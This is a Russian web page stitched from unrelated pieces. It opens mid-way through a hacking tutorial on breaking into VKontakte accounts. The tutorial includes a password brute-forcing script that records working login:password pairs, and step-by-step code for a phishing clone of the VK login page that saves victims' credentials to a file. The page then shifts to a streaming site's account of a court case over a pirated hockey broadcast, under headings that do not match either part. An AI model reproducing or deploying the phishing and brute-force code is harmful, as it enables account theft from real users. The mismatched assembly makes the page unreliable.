prefix1 = g.doc.rex_search('\+[0-9]*').group(0) prefix2 = g.doc.rex_search(' [0-9]*').group(0) pre1 = re.findall('[0-9]{1,}', prefix1)[0] pre2 = re.findall('[0-9]{1,}', prefix2)[0] login = login.replace(pre1, '') login = login.replace(pre2, '') g.set_input('code', login) g.submit() print(login + ':' + psswrd + '–success') out.write(login + ':' + psswrd + '') else: out.write(login + ':' + psswrd + '') else: if g.doc.rex_search('[>]+').group(0) == 'Login | ': print(login + ':' + psswrd + '–fail') else: print(login + ':' + psswrd + '–success') out.write(login + ':' + psswrd + '') out.close() psswrds.close()

Естественно, пример не оптимизирован. Можно ещё добавить прокси, многопоточность и прочие плюшки, но этим уже сами займётесь, если будет интересно. Зато скрипт способен сам вводить недостающие цифры в защиту ВКонтакте при заходе с другой страны, а также, используя Antigate, запросто вводит Captch'и, появляющиеся после 5-6 попытки ввода с одного IP.

3) «Фейк — наше все»

Способ, ориентированный на невнимательных юзеров. По большей части их либо завлекают халявой, либо отвлекают внимание с помощью многобукв. Я покажу вам, как создать простой фейк на основе обычного сайта вк (страницы логина).

Можете брать как мобильную, так и основную версии, зависит от того, с какого устройства будет заходить ваша цель. Что ж, приступим.
Первым делом качаем страницу логина вк через ваш браузер. Затем смените кодировку html файла на utf-8.

Сначала определяем кодировку

file –mime-encoding file.html

Затем меняем с исходной на новую

iconv -f iso-8859-1 -t utf-8 file.html > 2.html

Далее вам нужно создать управление страницей на серверном языке.

@route('/') def index(): return template('2.html') @route('/Welcome! | _files/') def server_static(filepath): return static_file(filepath, root='./Welcome! | _files/')

Как выяснилось, на кое-каких файлах порой выдаётся ошибка 404. У нас, к сожалению, не имеется нужных картинок с сайта, так что положим их в отдельную папку images.

mkdir images cd images wget wget “” wget “” mkdir icons cd icons wget “” wget “”

Пропишем новый роутинг в скрипте.

@route('/images/') def server_static(filepath): return static_file(filepath, root='./images/')

Отлично.

Конечно, по-хорошему надо было бы ещё также скачать основные страницы, на которые можно перейти с основной не залогинившись, чтобы было правдоподобней (а потом поменять ссылки в основной), но для начала и этого хватит.
Добавим роутинг для пост запроса. Найдем форму логина на странице. Изменим в ее коде action на пустое и удалим проверку onsubmit. И добавим обработку post-запроса.
@post('/') def index(): login = request.forms.get('email') password = request.forms.get('pass') print(“|Catch|————– ” + login + ':' + password) with open(“log.txt”, “a”) as myfile: myfile.write(login + ':' + password + “”) return redirect('http://www..com')

В заключении, переносим тег button, что под формой в коде в пределы формы и добавляем свойство type=”submit”, и наслаждаемся тем, что всё работает. Для тех, у кого что-то не получилось, представляем архив с готовым решением.

Если вы желаете оптимизировать этот процесс и не хотите прописывать всё это ручками, то можете воспользоваться инструментом SET. (Social Engineer Toolkit).

Другие материалы по теме:

10 лучших ресурсов для изучения хакинга с помощью Kali Linux
5 лучших Android приложений для взлома Wi-Fi сетей
10 лучших инструментов для хакинга в 2017 году

Источник: https://proglib.io/p/vk-hacking/

Ваше устройство было взломано

Взлом аккаунтов закон

Пост создан для придания огласке неимоверных масштабов пиздеца.

Текст взят с ресурса goodgame.ru ссылка

Эта история началась три месяца назад, мы не предавали ее огласке, чтобы не тревожить пользователей и не рисковать.

Но решить проблему с первого раза не удалось, а если не удастся во второй раз, то под угрозой GoodGame, в который многие люди вкладывали время и усилия.

Кроме того, данное дело касается всех сайтов, на которых размещены плееры стримерских платформ. Если на этих трансляциях будут нарушены права третьих лиц, то на сайт могут подать в суд. А контролировать происходящее на прямой трансляции невозможно по определению.

Короткое описание сути дела

Пользователь купил трансляцию КХЛ (Континентальной Хоккейной Лиги) и начал ретранслировать ее на разные службы: , Twitch, GoodGame др.

На нашем сайте трансляцию закрыли спустя 9 минут, ее посмотрело 40 человек. КХЛ подали на площадки в суд. От GoodGame хотели ~10,5 млн. рублей.

Суд частично удовлетворил требования истца: нас признали виновными, обязали заплатить 300 тыс. и, что самое главное, при повторном нарушении сайт могут заблокировать. При этом трансляцию могут запустить КХЛ или заинтересованные лица, и как бы быстро мы не среагировали, нас могут снова признать виновными.

Мы подали апелляцию на решение суда.

Подробное описание

На GoodGame.ru проходят главным образом стримы по играм, при этом на сайте периодически транслируются фильмы, сериалы, программы в специальном разделе “под галкой”.

Если приходит сообщение от правообладателя, мы прерываем трансляцию или закрываем ее полностью. Для этого на сайте есть система жалоб от пользователей и группа модераторов.

28 марта в 19.59 по московскому времени пришло письмо от ООО “КХЛ Маркетинг” с требованием остановить трансляцию на каналах

https://goodgame.ru/channel/mazl9lk_1/ и https://goodgame.ru/channel/Sportforall/.

Через 9 минут после получения письма обе трансляции были остановлены.

За это время две трансляции посмотрело 40 человек (включая истца, стримера и модераторов). Статистика просмотров из Яндекс.Метрики (2 скрин).

На следующий день был подан иск в Мосгорсуд с требованием прекратить трансляции, взыскать за два факта нарушения по 5 млн. рублей (максимально возможная по закону сумма), 400 тыс. за судебные издержки и оплатить госпошлину в размере 58200 рублей. Всего 10 458 200 рублей.

Об этом мы узнали не сразу, а 10 апреля, когда нам пришло письмо от представителя истца (2, 3, 4) и решение суда (2) о принятии предварительных обеспечительных мер.

Днем ранее, 9 апреля, пришло письмо от Роскомнадзора. К этому моменту оба канала были заблокированы, о чем мы РКНу написали. Они стандартно ответили, что в течение трех дней проверят и, в случае, если контент будет еще доступен, напишут снова. Они, естественно, не написали, подтвердив, что трансляция там не ведется, что логично.

Мы попробовали связаться с директором КХЛ Маркетинг, отправили ему письмо с описанием ситуации (2, 3, 4) и предложением по более оперативному закрытию каналов, нарушающих их права. Ответ был формальным (2).

Не доводить до суда

Мы также пробовали решить вопрос в досудебном порядке, чтобы не рисковать, проверяя на практике судебную систему. Этого сделать не удалось по двум причинам: во-первых, истец требовал не менее 1 млн. рублей, во-вторых, у нас не могло быть гарантии, что истец или другое заинтересованное лицо не запустит трансляцию повторно и не инициирует процесс для получения личной выгоды.

Действия КХЛ Маркетинга говорят о том, что их задача не пресечь незаконные трансляции, а заработать на этом.

Судебный иск был подан, несмотря на то, что трансляция сразу была остановлена.

Запрошена максимальная сумма компенсации

Игнорирование предложений по пресечению

Оказывали давление в процессе (присылали судебную практику без запросов, предлагали разные суммы и сроки по мировому соглашению)

Подготовка к суду

Привлекли хорошего адвоката. Консультировались с коллегами из сферы.

Подготовили отзыв на исковое заявление (2, 3, 4, 5, 6, 7, 8, 9).

О пользователе, который запустил трансляцию

У него пара аккаунтов на сайте, у нас есть основной email адрес, содержащий фамилию. Базовый поиск выдает имя и фамилию, твиттер с этими же данными, номер телефона и пр. Мы ходатайствовали о привлечении его к участию в деле в качестве третьего лица. Ходатайство было отклонено. В связи с этим при создании канала мы начали запрашивать больше информации о пользователе.

Короткое описание судебного процесса

В суде истец делал акцент на том, что у сайта есть лицензия СМИ и, соответственно, он должен отвечать за весь контент, который появляется на сайте (прим. от статуса СМИ мы уже отказались, но в решении суда СМИ упоминается вскользь, поэтому не факт, что это поможет в следующий раз).

Защита строилась на том, что у ООО “Мидиан” есть несколько направлений работы, в том числе и лицензия на “телематику”. Стримы относятся к пользовательскому контенту, а не к редакционному. Они выходят в прямом эфире и не редактируются. Поэтому здесь мы выступаем в качестве информационного посредника со всеми вытекающими последствиями.

Сам судебный процесс шел около полутора часов. Судья дал высказаться, казалось, вникал в суть дела и задавал правильные вопросы.

Решение суда (2, 3, 4, 5, 6, 7)

О Twitch

Похожий иск был подан и против компании Twitch. Им занимаются адвокаты компании Амазон. Насколько нам известно, там работало три аналогичных канала с 60 тыс. просмотрами. 2 июля 2019 года судебное дело было прекращено по мировому соглашению.

Дальнейшие действия

1. Привлечь внимание администрации других сайтов (СМИ или не СМИ – не важно). Если на вашем сайте будут размещены плееры, контент в которых нарушает права, вы можете быть признаны виновными за это. Не стриминговая служба, не пользователь, а вы.

2. Экспертное мнение. Уверены, что среди пользователей есть компетентные в этой сфере люди, которые могли бы высказать мнение и дать рекомендации.

3. Мы при создании канала спрашиваем номер телефона пользователя. Это усложнит создание новых каналов и поможет в идентификации пользователя.

Источник: https://pikabu.ru/story/vashe_ustroystvo_byilo_vzlomano_7775026

Поделиться:
Нет комментариев

    Добавить комментарий

    Ваш e-mail не будет опубликован. Все поля обязательны для заполнения.